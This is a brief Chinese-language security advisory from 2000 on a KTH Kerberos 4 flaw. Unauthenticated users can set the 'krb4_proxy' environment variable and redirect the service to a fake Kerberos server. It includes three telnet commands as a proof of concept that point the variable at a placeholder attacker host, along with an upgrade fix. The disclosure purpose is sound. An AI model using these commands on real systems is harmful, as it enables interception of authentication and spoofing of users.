KTH Kerberos 4存在任意代理可使用漏洞发布时间:2000-12-12 更新时间:2000-12-12 严重程度:中 威胁程度:欺骗 错误类型:环境错误 利用方式:服务器模式 受影响系统 KTH Kerberos 4 1.0.3-1.0详细描述 Kerberos是一个广泛的网络设备认证系统,这个版本由KTH开发和维护,其中存在一个漏洞,KTH kerberos当要一个代理服务请求的时候使用一个叫'krb4_proxy'的环境变量,它需要通过HTTP获得ticket。如果该变量设置了的话,KTH Kerberos-supported设备会连接提供的代理服务来代替默认的Kerberos服务。其中存在可能使恶意远程用户(在认证前)远程设置此变量值并使服务程序连接一个伪造的Kerberos服务器,这可以导致攻击者截获认证请求或者发送错误的信息给想要使用这些服务的用户。 测试代码 telnet> environ define krb4_proxy http://your.host:80 telnet> environ export krb4_proxy telnet> open localhost 解决方案 升级程序: KTH Kerberos 4 1.0.3: KTH upgrade Kerberos 4 1.0.4 ftp://ftp.pdc.kth.se/pub/krb/src/krb4-1.0.4.tar.gz 相关信息 |
